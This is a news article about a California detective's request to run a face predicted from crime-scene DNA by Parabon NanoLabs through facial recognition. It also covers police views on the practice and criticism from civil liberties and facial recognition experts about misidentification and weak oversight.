In a controversial 2017 decision, the department published the predicted face in an attempt to solicit tips from the public. Then, in 2020, one of the detectives did something civil liberties experts say is even more problematic—and a violation of Parabon NanoLabs’ terms of service: He asked to have the rendering run through facial recognition software.

“Using DNA found at the crime scene, Parabon Labs reconstructed a possible suspect’s facial features,” the detective explained in a request for “analytical support” sent to the Northern California Regional Intelligence Center, a so-called fusion center that facilitates collaboration among federal, state, and local police departments. “I have a photo of the possible suspect and would like to use facial recognition technology to identify a suspect/lead.”

The detective’s request to run a DNA-generated estimation of a suspect’s face through facial recognition tech has not previously been reported. Found in a trove of hacked police records published by the transparency collective Distributed Denial of Secrets, it appears to be the first known instance of a police department attempting to use facial recognition on a face algorithmically generated from crime-scene DNA.

It likely won’t be the last.

For facial recognition experts and privacy advocates, the East Bay detective’s request, while dystopian, was also entirely predictable. It emphasizes the ways that, without oversight, law enforcement is able to mix and match technologies in unintended ways, using untested algorithms to single out suspects based on unknowable criteria.

“It’s really just junk science to consider something like this,” Jennifer Lynch, general counsel at civil liberties nonprofit the Electronic Frontier Foundation, tells WIRED. Running facial recognition with unreliable inputs, like an algorithmically generated face, is more likely to misidentify a suspect than provide law enforcement with a useful lead, she argues. “There’s no real evidence that Parabon can accurately produce a face in the first place,” Lynch says. “It’s very dangerous, because it puts people at risk of being a suspect for a crime they didn’t commit.”

It is unknown whether the Northern California Regional Intelligence Center honored the East Bay detective’s request. The NCRIC did not respond to WIRED’s requests for comment about the outcome of the detective's facial recognition request. Captain Terrence Cotcher of the East Bay Regional Park District PD would not comment on the identification request, citing what he describes as an active homicide investigation. However, the executive director of the NCRIC, Mike Sena, told The Markup in 2021 that whenever the fusion center gets facial recognition requests, it will run a search.

For Parabon NanoLabs, if the department ran the predicted face through facial recognition, it isn’t just a violation of the company’s terms of service—it’s a terrible idea.

Parabon NanoLabs, founded in 2008, primarily focuses on forensic genetic genealogy services for law enforcement, a process that involves comparing DNA data with profiles in genealogy databases to locate potential suspects or victims. In 2012, the company received a grant from the US Department of Defense’s Defense Threat Reduction Agency to explore DNA phenotyping, predicting a person's appearance based only on their DNA. According to a 2020 article in _Nature_, the DOD was initially interested in developing phenotyping technology to re-create the faces of people who made improvised explosive devices, using traces of DNA left on the bomb fragments. Parabon pitched an ambitious method that involved machine learning to receive its grant.

Ellen Greytak, the director of bioinformatics at Parabon NanoLabs, says the company uses machine learning to build predictive models “for each part of the face.” The models are trained on the DNA data of more than 1,000 research volunteers and paired with 3D scans of their faces. Each scanned face, Greytak says, has 21,000 phenotypes—observable physical traits—that their models crunch in order to figure out how parts of a DNA sample affect a face’s appearance.

Parabon says it can confidently predict the color of a person's hair, eyes, and skin, along with the amount of freckles they have and the general shape of their face. These phenotypes form the basis of the face renderings the company generates for law enforcement. Parabon’s methods have not been peer-reviewed, and scientists are skeptical about how feasible predicting face shape even is.

In response to questions about the technology's accuracy, Parabon NanoLabs vice president Paula Armentrout tells WIRED that, while the details of its methods are not public, the company has presented its work at conferences and has tested its technology on thousands of samples. She adds that the company posts on its website “every single composite that is publicly disclosed by a customer, so people can draw their own conclusions about how well our technology works.”

Greytak characterizes the company’s face predictions as something more like a description of a suspect than an exact replica of their face. “What we are predicting is more like—given this person’s sex and ancestry, will they have wider-set eyes than average,” she says. “There’s no way you can get individual identifications from that.”

When Parabon NanoLabs launched its face-prediction service around 2015, its terms of service did not explicitly ban clients from using predictions with facial recognition. Soon after launching, however, the company’s law enforcement clients started asking about the viability of running phenotype-generated faces through facial recognition tools. “We were surprised when we heard this,” Greytak says. “It’s just not the intended purpose of the composite images.” In 2016, the company added a clause to its terms prohibiting customers from using facial recognition on its Snapshot Phenotype Reports. However, Armentrout tells WIRED that the company “does not have a way to ensure compliance” with its TOS.

Eight years later, after generating scores of face predictions for law enforcement, some of Parabon NanoLabs’ clients see little reason to not consider using face recognition on these algorithmically generated faces. Officers at all of the departments that WIRED contacted say it should at least be an option.

Jason McDonald is a detective with the Aurora, Colorado, police department’s Major Crime-Homicide Unit. In 2016, his department asked Parabon to use DNA found on the scenes of four 1984 homicides to predict the face of a suspect. McDonald tells WIRED that he believes that running a predicted face through facial recognition could be “justified” and “possibly a useful tool.”

Detective Edward Silver of the St. Clair County Sheriff’s Department in Michigan agrees. His department used Parabon NanoLabs in 2021 to generate the face of a woman whose severely burned body was found in a dumpster in 2003. Silver tells WIRED that he believes the Snapshot Phenotype Reports are accurate enough for facial recognition software.

Representatives from sheriff's offices in Lake County, Florida, and DeKalb County, Illinois, also say they would consider using Parabon NanoLabs’ predicted faces with facial recognition tools. Sheriff Andrew Sullivan of the DeKalb County Sheriff’s Office says in an email that “if there was DNA evidence that was used in the development of Snapshot, yes, we would use that information to try and develop any lead that we had further to solve any homicide.”

Haley Williams, a communications manager with the Boise Police Department in Idaho, tells WIRED in an email that the decision to use facial recognition with an algorithmically generated face would be made on a “case-by-case” basis. She added, however, that the department would “never rely solely on any one piece of evidence and would only use it as a tool to help direct us to other leads or evidence.”

“These are decades-old cases that we have been working,” says a cold-case detective who asked not to be named because they are not authorized to speak to the media. “I know that the Parabon face isn’t perfect, but why wouldn’t we use every tool available to us to try and catch a killer?” Asked if he tried facial recognition with the predicted face, the detective declined to answer, but says, “the family deserves to know that we tried everything.”

Lynch, of the Electronic Frontier Foundation, tells WIRED that while she is sympathetic to detectives wanting to bring closure for the family, the risks of misidentification with this use case are too great. “I think it goes to show a complete misunderstanding about the high-risk errors of facial recognition,” Lynch says. “It’s surprising to me that cops think this kind of technology will produce leads that they can actually use.”

Phenotyping is often a last resort that departments try only after they’ve exhausted other leads. According to Parabon NanoLabs, the majority of cases it works on do not actually get to the facial composite stage. “I joke that my phenotyping can tell you if your suspect has blue eyes, but my genealogist can tell you the guy’s address,” Greytak says.

The fact that law enforcement investigators consider using these predictions in conjunction with facial recognition speaks to a general lack of oversight over investigatory tools, experts say. There are no federal rules that limit the types of images police can use with face recognition software, and it’s up to both the police departments and the facial recognition vendor to implement and enforce safeguards.

According to a report released in September by the US Government Accountability Office, only 5 percent of the 196 FBI agents who have access to facial recognition technology from outside vendors have completed any training on how to properly use the tools. The report notes that the agency also lacks any internal policies for facial recognition to safeguard against privacy and civil liberties abuses.

In the past few years, facial recognition has improved considerably. In 2018, when the National Institute of Standards and Technology tested face recognition algorithms on a mug shot database of 12 million people, it found that 99.9 percent of searches identified the correct person. However, the NIST also found disparities in how the algorithms it tested performed across demographic groups.

Crucially, the NIST tested these algorithms only with high-quality images like driver's license and passport photos; law enforcement is often less discerning. A 2019 report from Georgetown’s Center on Privacy and Technology written by Clare Garvie, a facial recognition expert and privacy lawyer, found that law enforcement agencies nationwide have used facial recognition tools on images that include blurry surveillance camera shots, manipulated photos of suspects, and even composite sketches created by traditional artists.

According to an internal New York Police Department presentation cited by Garvie in her report, NYPD detective Tom Markiewicz wrote in 2018 that the department has tried running face recognition on forensic sketches and found that “sketches do not work.” In another infamous example that Garvie cites in her report, a detective from the NYPD’s Facial Identification Section, after noting that a suspect looked like the actor Woody Harrelson, put a photo of the actor through the department’s facial recognition tool.

“Because modern facial recognition algorithms are trained neural networks, we just don’t know exactly what criteria the systems use to identify a face,” Garvie, who now works at the National Association of Criminal Defense Lawyers, tells WIRED. “Daisy chaining unreliable or imprecise black-box tools together is simply going to produce unreliable results,” she says.

“We should know this by now.”

Tag

#web